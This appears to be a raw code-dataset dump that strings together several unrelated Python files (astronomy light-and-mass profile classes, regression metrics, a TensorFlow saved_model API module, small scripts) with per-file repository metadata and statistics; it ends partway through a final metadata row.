    # (-(x0 & x1) & (-x2 & x3)) & ((x4 & x5) & -(x6 & -x7))
    crc = Circuit(AndGate(
        AndGate(NotGate(AndGate(inputs[0], inputs[1])),
                AndGate(NotGate(inputs[2]), inputs[3])),
        AndGate(AndGate(inputs[4], inputs[5]),
                NotGate(AndGate(inputs[6], NotGate(inputs[7]))))))
    print('Circuit: %s' % (crc))
    bp = BranchingProgram.fromCircuit(crc)
    # Python 3 print() calls (the original mixed Py2 print statements in).
    print(bp)
    print('Branching Program Instructions:')
    print(bp.getInstructionString())
    print('BranchingProgram testing start...')
    # product() is iterated lazily; no need to materialize the 2**8 tuples.
    for test in product([0, 1], repeat=inputLength):
        test = list(test)
        circuitResult = crc.evaluate(test)
        bpResult = bp.evaluate(test)
        print('Input: %s => C: %d, BP: %d, equal?: %s' % (test, circuitResult, bpResult, circuitResult == bpResult))
| 52.535433
| 4,149
| 0.596897
| 3,051
| 13,344
| 2.596853
| 0.114389
| 0.228954
| 0.235895
| 0.201439
| 0.297236
| 0.264294
| 0.24107
| 0.236274
| 0.236274
| 0.236274
| 0
| 0.210214
| 0.116607
| 13,344
| 254
| 4,150
| 52.535433
| 0.46191
| 0.021733
| 0
| 0.058065
| 0
| 0
| 0.034358
| 0
| 0
| 0
| 0
| 0
| 0.03871
| 0
| null | null | 0
| 0.051613
| null | null | 0.03871
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be24c042e731a8aaf691cc0aa21d6943f26ea6f7
| 19,759
|
py
|
Python
|
autogalaxy/profiles/light_and_mass_profiles.py
|
jonathanfrawley/PyAutoGalaxy
|
55fb44f22ce5490318378dc31596c887d0d2e29b
|
[
"MIT"
] | null | null | null |
autogalaxy/profiles/light_and_mass_profiles.py
|
jonathanfrawley/PyAutoGalaxy
|
55fb44f22ce5490318378dc31596c887d0d2e29b
|
[
"MIT"
] | null | null | null |
autogalaxy/profiles/light_and_mass_profiles.py
|
jonathanfrawley/PyAutoGalaxy
|
55fb44f22ce5490318378dc31596c887d0d2e29b
|
[
"MIT"
] | null | null | null |
from autogalaxy.profiles import light_profiles as lp
from autogalaxy.profiles import mass_profiles as mp
from typing import Tuple
"""
Mass and light profiles describe both mass distributions and light distributions with a single set of parameters. This
means that the light and mass of these profiles are tied together. Galaxy instances interpret these
objects as being both mass and light profiles.
"""
class LightMassProfile:
    """Marker base class tagging a profile as both a light and a mass profile.

    Galaxy instances check for this type to treat one parameterised object as
    simultaneously a light distribution and a mass distribution.
    """
class EllGaussian(lp.EllGaussian, mp.EllGaussian, LightMassProfile):
    """Elliptical Gaussian acting as both a light and a mass profile.

    Both parents are initialised from one shared parameter set; only the mass
    parent additionally receives the mass-to-light ratio.
    """

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        elliptical_comps: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        sigma: float = 0.01,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        elliptical_comps
            The two ellipticity components of the profile's elliptical geometry.
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        sigma
            The sigma value of the Gaussian.
        mass_to_light_ratio : float
            The mass-to-light ratio; passed to the mass-profile parent only.
        """
        # Initialise each parent explicitly (not via super()) so the shared
        # parameters reach both the light and the mass implementation.
        lp.EllGaussian.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            sigma=sigma,
        )
        mp.EllGaussian.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            sigma=sigma,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class EllSersic(lp.EllSersic, mp.EllSersic, LightMassProfile):
    """Elliptical Sersic acting as both a light and a mass profile.

    Both parents are initialised from one shared parameter set; only the mass
    parent additionally receives the mass-to-light ratio.
    """

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        elliptical_comps: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        sersic_index: float = 0.6,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        elliptical_comps
            The two ellipticity components of the profile's elliptical geometry.
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        sersic_index
            The concentration of the light profiles
        mass_to_light_ratio : float
            The mass-to-light ratio; passed to the mass-profile parent only.
        """
        # Initialise each parent explicitly (not via super()) so the shared
        # parameters reach both the light and the mass implementation.
        lp.EllSersic.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=sersic_index,
        )
        mp.EllSersic.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=sersic_index,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class SphSersic(EllSersic, LightMassProfile):
    """Spherical Sersic light-and-mass profile.

    The elliptical parent with its ellipticity components pinned to
    (0.0, 0.0).
    """

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        sersic_index: float = 0.6,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        sersic_index
            The concentration of the light profiles
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        """
        # Next class in the MRO is EllSersic, so super() delegates there.
        super().__init__(
            centre=centre,
            elliptical_comps=(0.0, 0.0),
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=sersic_index,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class EllExponential(EllSersic, LightMassProfile):
    """Elliptical Exponential light-and-mass profile.

    A Sersic profile with the Sersic index pinned to 1.0.
    """

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        elliptical_comps: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        elliptical_comps
            The two ellipticity components of the profile's elliptical geometry.
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        """
        # Next class in the MRO is EllSersic, so super() delegates there.
        super().__init__(
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=1.0,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class SphExponential(EllExponential, LightMassProfile):
    """Spherical Exponential light-and-mass profile.

    The elliptical Exponential with its ellipticity components pinned to
    (0.0, 0.0).
    """

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        """
        # Next class in the MRO is EllExponential, so super() delegates there.
        super().__init__(
            centre=centre,
            elliptical_comps=(0.0, 0.0),
            intensity=intensity,
            effective_radius=effective_radius,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class EllDevVaucouleurs(EllSersic, LightMassProfile):
    """Elliptical de Vaucouleurs light-and-mass profile.

    A Sersic profile with the Sersic index pinned to 4.0.
    """

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        elliptical_comps: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        elliptical_comps
            The two ellipticity components of the profile's elliptical geometry.
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        """
        # Zero-argument super() (Python 3) — next class in the MRO is EllSersic.
        super().__init__(
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=4.0,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class SphDevVaucouleurs(EllDevVaucouleurs, LightMassProfile):
    """Spherical de Vaucouleurs light-and-mass profile.

    The elliptical de Vaucouleurs with its ellipticity components pinned to
    (0.0, 0.0).
    """

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        """
        # Next class in the MRO is EllDevVaucouleurs, so super() delegates there.
        super().__init__(
            centre=centre,
            elliptical_comps=(0.0, 0.0),
            intensity=intensity,
            effective_radius=effective_radius,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class EllSersicRadialGradient(
    lp.EllSersic, mp.EllSersicRadialGradient, LightMassProfile
):
    """Elliptical Sersic light profile paired with a radially-varying
    mass-to-light-ratio mass profile, sharing one parameter set."""

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        elliptical_comps: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        sersic_index: float = 0.6,
        mass_to_light_ratio: float = 1.0,
        mass_to_light_gradient: float = 0.0,
    ):
        """
        Setup a Sersic mass and light profiles.
        Parameters
        ----------
        centre
            The origin of the profiles
        elliptical_comps
            The two ellipticity components of the profile's elliptical geometry.
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        sersic_index : Int
            The concentration of the light profiles
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        mass_to_light_gradient : float
            The mass-to-light radial gradient.
        """
        # Initialise each parent explicitly; only the mass parent takes the
        # mass-to-light ratio and its radial gradient.
        lp.EllSersic.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=sersic_index,
        )
        mp.EllSersicRadialGradient.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=sersic_index,
            mass_to_light_ratio=mass_to_light_ratio,
            mass_to_light_gradient=mass_to_light_gradient,
        )
class SphSersicRadialGradient(EllSersicRadialGradient, LightMassProfile):
    """Spherical Sersic light-and-mass profile with a radial mass-to-light
    gradient: the elliptical parent with ellipticity pinned to (0.0, 0.0)."""

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        sersic_index: float = 0.6,
        mass_to_light_ratio: float = 1.0,
        mass_to_light_gradient: float = 0.0,
    ):
        """
        Parameters
        ----------
        centre
            The origin of the profiles
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        sersic_index : Int
            The concentration of the light profiles
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        mass_to_light_gradient : float
            The mass-to-light radial gradient.
        """
        # Next class in the MRO is EllSersicRadialGradient.
        super().__init__(
            centre=centre,
            elliptical_comps=(0.0, 0.0),
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=sersic_index,
            mass_to_light_ratio=mass_to_light_ratio,
            mass_to_light_gradient=mass_to_light_gradient,
        )
class EllExponentialRadialGradient(EllSersicRadialGradient, LightMassProfile):
    """Elliptical Exponential light-and-mass profile with a radial
    mass-to-light gradient: a Sersic with the index pinned to 1.0."""

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        elliptical_comps: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        mass_to_light_ratio: float = 1.0,
        mass_to_light_gradient: float = 0.0,
    ):
        """
        Parameters
        ----------
        centre
            The origin of the profiles
        elliptical_comps
            The two ellipticity components of the profile's elliptical geometry.
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        mass_to_light_gradient : float
            The mass-to-light radial gradient.
        """
        # Next class in the MRO is EllSersicRadialGradient.
        super().__init__(
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=1.0,
            mass_to_light_ratio=mass_to_light_ratio,
            mass_to_light_gradient=mass_to_light_gradient,
        )
class SphExponentialRadialGradient(SphSersicRadialGradient, LightMassProfile):
    """Spherical Exponential light-and-mass profile with a radial
    mass-to-light gradient: a spherical Sersic with the index pinned to 1.0."""

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        effective_radius: float = 0.6,
        mass_to_light_ratio: float = 1.0,
        mass_to_light_gradient: float = 0.0,
    ):
        """
        Parameters
        ----------
        centre
            The origin of the profiles
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        effective_radius
            The radius containing half the light of this model_mapper
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        mass_to_light_gradient : float
            The mass-to-light radial gradient.
        """
        # Next class in the MRO is SphSersicRadialGradient.
        super().__init__(
            centre=centre,
            intensity=intensity,
            effective_radius=effective_radius,
            sersic_index=1.0,
            mass_to_light_ratio=mass_to_light_ratio,
            mass_to_light_gradient=mass_to_light_gradient,
        )
class EllSersicCore(lp.EllSersicCore, mp.EllSersicCore, LightMassProfile):
    """Elliptical cored-Sersic profile acting as both a light and a mass
    profile, sharing one parameter set between the two parents."""

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        elliptical_comps: Tuple[float, float] = (0.0, 0.0),
        effective_radius: float = 0.6,
        sersic_index: float = 4.0,
        radius_break: float = 0.01,
        intensity_break: float = 0.05,
        gamma: float = 0.25,
        alpha: float = 3.0,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        elliptical_comps
            The two ellipticity components of the profile's elliptical geometry.
        effective_radius
            The radius containing half the light of this model_mapper
        sersic_index
            The concentration of the light profiles
        radius_break
            The break radius of the cored profile.
        intensity_break
            The intensity at the break radius.
        gamma
            The inner power-law slope of the cored profile.
        alpha
            The sharpness of the transition at the break radius.
        mass_to_light_ratio : float
            The mass-to-light ratio; passed to the mass-profile parent only.
        """
        # Initialise each parent explicitly (not via super()) so the shared
        # parameters reach both the light and the mass implementation.
        lp.EllSersicCore.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            effective_radius=effective_radius,
            sersic_index=sersic_index,
            radius_break=radius_break,
            intensity_break=intensity_break,
            gamma=gamma,
            alpha=alpha,
        )
        mp.EllSersicCore.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            effective_radius=effective_radius,
            sersic_index=sersic_index,
            radius_break=radius_break,
            intensity_break=intensity_break,
            gamma=gamma,
            alpha=alpha,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class SphSersicCore(EllSersicCore, LightMassProfile):
    """Spherical cored-Sersic light-and-mass profile: the elliptical parent
    with its ellipticity components pinned to (0.0, 0.0)."""

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        effective_radius: float = 0.6,
        sersic_index: float = 4.0,
        radius_break: float = 0.01,
        intensity_break: float = 0.05,
        gamma: float = 0.25,
        alpha: float = 3.0,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        effective_radius
            The radius containing half the light of this model_mapper
        sersic_index
            The concentration of the light profiles
        radius_break
            The break radius of the cored profile.
        intensity_break
            The intensity at the break radius.
        gamma
            The inner power-law slope of the cored profile.
        alpha
            The sharpness of the transition at the break radius.
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        """
        # Next class in the MRO is EllSersicCore.
        super().__init__(
            centre=centre,
            elliptical_comps=(0.0, 0.0),
            effective_radius=effective_radius,
            sersic_index=sersic_index,
            radius_break=radius_break,
            intensity_break=intensity_break,
            gamma=gamma,
            alpha=alpha,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class EllChameleon(lp.EllChameleon, mp.EllChameleon, LightMassProfile):
    """Elliptical Chameleon profile acting as both a light and a mass profile,
    sharing one parameter set between the two parents."""

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        elliptical_comps: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        core_radius_0: float = 0.01,
        core_radius_1: float = 0.005,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        elliptical_comps
            The two ellipticity components of the profile's elliptical geometry.
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        core_radius_0
            The first core radius of the Chameleon profile.
        core_radius_1
            The second core radius of the Chameleon profile.
        mass_to_light_ratio : float
            The mass-to-light ratio; passed to the mass-profile parent only.
        """
        # Initialise each parent explicitly (not via super()) so the shared
        # parameters reach both the light and the mass implementation.
        lp.EllChameleon.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            core_radius_0=core_radius_0,
            core_radius_1=core_radius_1,
        )
        mp.EllChameleon.__init__(
            self,
            centre=centre,
            elliptical_comps=elliptical_comps,
            intensity=intensity,
            core_radius_0=core_radius_0,
            core_radius_1=core_radius_1,
            mass_to_light_ratio=mass_to_light_ratio,
        )
class SphChameleon(EllChameleon, LightMassProfile):
    """Spherical Chameleon light-and-mass profile: the elliptical parent with
    its ellipticity components pinned to (0.0, 0.0)."""

    def __init__(
        self,
        centre: Tuple[float, float] = (0.0, 0.0),
        intensity: float = 0.1,
        core_radius_0: float = 0.01,
        core_radius_1: float = 0.005,
        mass_to_light_ratio: float = 1.0,
    ):
        """
        Parameters
        ----------
        centre
            The grid of the origin of the profiles
        intensity
            Overall flux intensity normalisation in the light profiles (electrons per second)
        core_radius_0
            The first core radius of the Chameleon profile.
        core_radius_1
            The second core radius of the Chameleon profile.
        mass_to_light_ratio : float
            The mass-to-light ratio of the light profiles
        """
        # Next class in the MRO is EllChameleon.
        super().__init__(
            centre=centre,
            elliptical_comps=(0.0, 0.0),
            intensity=intensity,
            core_radius_0=core_radius_0,
            core_radius_1=core_radius_1,
            mass_to_light_ratio=mass_to_light_ratio,
        )
| 34.303819
| 119
| 0.586113
| 2,195
| 19,759
| 5.021412
| 0.05467
| 0.016512
| 0.086826
| 0.09726
| 0.914625
| 0.914625
| 0.914625
| 0.912357
| 0.909454
| 0.905643
| 0
| 0.021613
| 0.346677
| 19,759
| 575
| 120
| 34.363478
| 0.83221
| 0.298801
| 0
| 0.829851
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044776
| false
| 0.002985
| 0.008955
| 0
| 0.101493
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be293cfea674cc1055adae0c7ba54e4a29aa0c66
| 121
|
py
|
Python
|
bin/version.py
|
pyDarkVOS/InarkOS
|
21b57a7f0e5a06d276e18e25ac8c30232eb0d8de
|
[
"Apache-2.0"
] | 3
|
2022-02-20T17:22:18.000Z
|
2022-03-20T02:56:07.000Z
|
bin/version.py
|
InarkVOS/InarkOS
|
21b57a7f0e5a06d276e18e25ac8c30232eb0d8de
|
[
"Apache-2.0"
] | null | null | null |
bin/version.py
|
InarkVOS/InarkOS
|
21b57a7f0e5a06d276e18e25ac8c30232eb0d8de
|
[
"Apache-2.0"
] | 2
|
2022-03-11T13:36:37.000Z
|
2022-03-18T23:47:20.000Z
|
from rich import print
def version():
    """Print the release banner (rich markup tags for colour/bold)."""
    banner = "[green]Release[/green] [bold]18.3[/bold] [green]production[/green]"
    print(banner)
| 30.25
| 79
| 0.677686
| 17
| 121
| 4.823529
| 0.705882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.028571
| 0.132231
| 121
| 4
| 79
| 30.25
| 0.752381
| 0
| 0
| 0
| 0
| 0.333333
| 0.554622
| 0.394958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 7
|
076d29a3248b6f10f5547032ff4853ff3ada0fe7
| 1,034
|
py
|
Python
|
src/metrics/regression.py
|
dankiy/mm-ml-2021
|
cd49a1be79d4cbdbb3a7b207162d15fc850f34fb
|
[
"MIT"
] | null | null | null |
src/metrics/regression.py
|
dankiy/mm-ml-2021
|
cd49a1be79d4cbdbb3a7b207162d15fc850f34fb
|
[
"MIT"
] | null | null | null |
src/metrics/regression.py
|
dankiy/mm-ml-2021
|
cd49a1be79d4cbdbb3a7b207162d15fc850f34fb
|
[
"MIT"
] | null | null | null |
import numpy as np
def mse(y_true: np.ndarray, y_pred: np.ndarray) -> float:
    """
    Mean squared error

    Args:
        y_true (np.ndarray): ground-truth values
        y_pred (np.ndarray): predicted values

    Returns:
        float: metric value
    """
    squared_errors = (y_true - y_pred) ** 2
    return np.mean(squared_errors)
def rmse(y_true: np.ndarray, y_pred: np.ndarray) -> float:
    """
    Root mean squared error

    Args:
        y_true (np.ndarray): ground-truth values
        y_pred (np.ndarray): predicted values

    Returns:
        float: metric value
    """
    errors = y_true - y_pred
    return np.sqrt(np.mean(errors * errors))
def r2(y_true: np.ndarray, y_pred: np.ndarray) -> float:
    """
    Coefficient of determination

    Args:
        y_true (np.ndarray): ground-truth values
        y_pred (np.ndarray): predicted values

    Returns:
        float: metric value
    """
    ss_residual = np.sum((y_true - y_pred) ** 2)
    ss_total = np.sum((y_true - np.mean(y_true)) ** 2)
    return 1 - ss_residual / ss_total
| 20.68
| 96
| 0.597679
| 147
| 1,034
| 4.047619
| 0.238095
| 0.181513
| 0.082353
| 0.141176
| 0.823529
| 0.805042
| 0.805042
| 0.805042
| 0.805042
| 0.638655
| 0
| 0.008043
| 0.27853
| 1,034
| 49
| 97
| 21.102041
| 0.789544
| 0.448743
| 0
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0
| 0.1
| 0
| 0.7
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
07f8af750b680592e3bff52ada1698cfd25eb642
| 4,066
|
py
|
Python
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/saved_model/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 2
|
2019-08-04T20:28:14.000Z
|
2019-10-27T23:26:42.000Z
|
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/saved_model/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | null | null | null |
cart_venv/Lib/site-packages/tensorflow_core/_api/v1/saved_model/__init__.py
|
juice1000/Synchronous-vs-Asynchronous-Learning-Tensorflow-
|
654be60f7986ac9bb7ce1d080ddee377c3389f93
|
[
"MIT"
] | 1
|
2020-11-04T03:16:29.000Z
|
2020-11-04T03:16:29.000Z
|
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.saved_model namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from tensorflow._api.v1.saved_model import builder
from tensorflow._api.v1.saved_model import constants
from tensorflow._api.v1.saved_model import experimental
from tensorflow._api.v1.saved_model import loader
from tensorflow._api.v1.saved_model import main_op
from tensorflow._api.v1.saved_model import signature_constants
from tensorflow._api.v1.saved_model import signature_def_utils
from tensorflow._api.v1.saved_model import tag_constants
from tensorflow._api.v1.saved_model import utils
from tensorflow.python.saved_model.builder_impl import SavedModelBuilder as Builder
from tensorflow.python.saved_model.constants import ASSETS_DIRECTORY
from tensorflow.python.saved_model.constants import ASSETS_KEY
from tensorflow.python.saved_model.constants import LEGACY_INIT_OP_KEY
from tensorflow.python.saved_model.constants import MAIN_OP_KEY
from tensorflow.python.saved_model.constants import SAVED_MODEL_FILENAME_PB
from tensorflow.python.saved_model.constants import SAVED_MODEL_FILENAME_PBTXT
from tensorflow.python.saved_model.constants import SAVED_MODEL_SCHEMA_VERSION
from tensorflow.python.saved_model.constants import VARIABLES_DIRECTORY
from tensorflow.python.saved_model.constants import VARIABLES_FILENAME
from tensorflow.python.saved_model.load import load as load_v2
from tensorflow.python.saved_model.loader_impl import load
from tensorflow.python.saved_model.loader_impl import maybe_saved_model_directory
from tensorflow.python.saved_model.loader_impl import maybe_saved_model_directory as contains_saved_model
from tensorflow.python.saved_model.main_op_impl import main_op_with_restore
from tensorflow.python.saved_model.save import save
from tensorflow.python.saved_model.signature_constants import CLASSIFY_INPUTS
from tensorflow.python.saved_model.signature_constants import CLASSIFY_METHOD_NAME
from tensorflow.python.saved_model.signature_constants import CLASSIFY_OUTPUT_CLASSES
from tensorflow.python.saved_model.signature_constants import CLASSIFY_OUTPUT_SCORES
from tensorflow.python.saved_model.signature_constants import DEFAULT_SERVING_SIGNATURE_DEF_KEY
from tensorflow.python.saved_model.signature_constants import PREDICT_INPUTS
from tensorflow.python.saved_model.signature_constants import PREDICT_METHOD_NAME
from tensorflow.python.saved_model.signature_constants import PREDICT_OUTPUTS
from tensorflow.python.saved_model.signature_constants import REGRESS_INPUTS
from tensorflow.python.saved_model.signature_constants import REGRESS_METHOD_NAME
from tensorflow.python.saved_model.signature_constants import REGRESS_OUTPUTS
from tensorflow.python.saved_model.signature_def_utils_impl import build_signature_def
from tensorflow.python.saved_model.signature_def_utils_impl import classification_signature_def
from tensorflow.python.saved_model.signature_def_utils_impl import is_valid_signature
from tensorflow.python.saved_model.signature_def_utils_impl import predict_signature_def
from tensorflow.python.saved_model.signature_def_utils_impl import regression_signature_def
from tensorflow.python.saved_model.simple_save import simple_save
from tensorflow.python.saved_model.tag_constants import GPU
from tensorflow.python.saved_model.tag_constants import SERVING
from tensorflow.python.saved_model.tag_constants import TPU
from tensorflow.python.saved_model.tag_constants import TRAINING
from tensorflow.python.saved_model.utils_impl import build_tensor_info
from tensorflow.python.saved_model.utils_impl import get_tensor_from_tensor_info
# Generated epilogue: drop the compat helper name so it is not exported from
# this module's namespace.
del _print_function

from tensorflow.python.util import module_wrapper as _module_wrapper

# Wrap this module in TFModuleWrapper exactly once, so attribute access can be
# intercepted (deprecation=True enables deprecation warnings; public_apis=None
# applies no public-API filtering).
if not isinstance(_sys.modules[__name__], _module_wrapper.TFModuleWrapper):
  _sys.modules[__name__] = _module_wrapper.TFModuleWrapper(
      _sys.modules[__name__], "saved_model", public_apis=None, deprecation=True,
      has_lite=False)
| 60.686567
| 105
| 0.886621
| 580
| 4,066
| 5.862069
| 0.17069
| 0.164706
| 0.235294
| 0.286765
| 0.786471
| 0.751176
| 0.747941
| 0.68
| 0.432059
| 0.253235
| 0
| 0.002633
| 0.065912
| 4,066
| 66
| 106
| 61.606061
| 0.892575
| 0.041072
| 0
| 0
| 1
| 0
| 0.002827
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.910714
| 0
| 0.910714
| 0.035714
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
ed101c6fe9e198a1d6a5ad85af2d100fe5368f48
| 34
|
py
|
Python
|
{{ cookiecutter.repo_name }}/src/{{ cookiecutter.repo_name }}/models/types/__init__.py
|
NickBeeuwsaert/pyramid.cookiecutter
|
bde9654bd5cb8a5a2458147651136686cf2b0f00
|
[
"MIT"
] | null | null | null |
{{ cookiecutter.repo_name }}/src/{{ cookiecutter.repo_name }}/models/types/__init__.py
|
NickBeeuwsaert/pyramid.cookiecutter
|
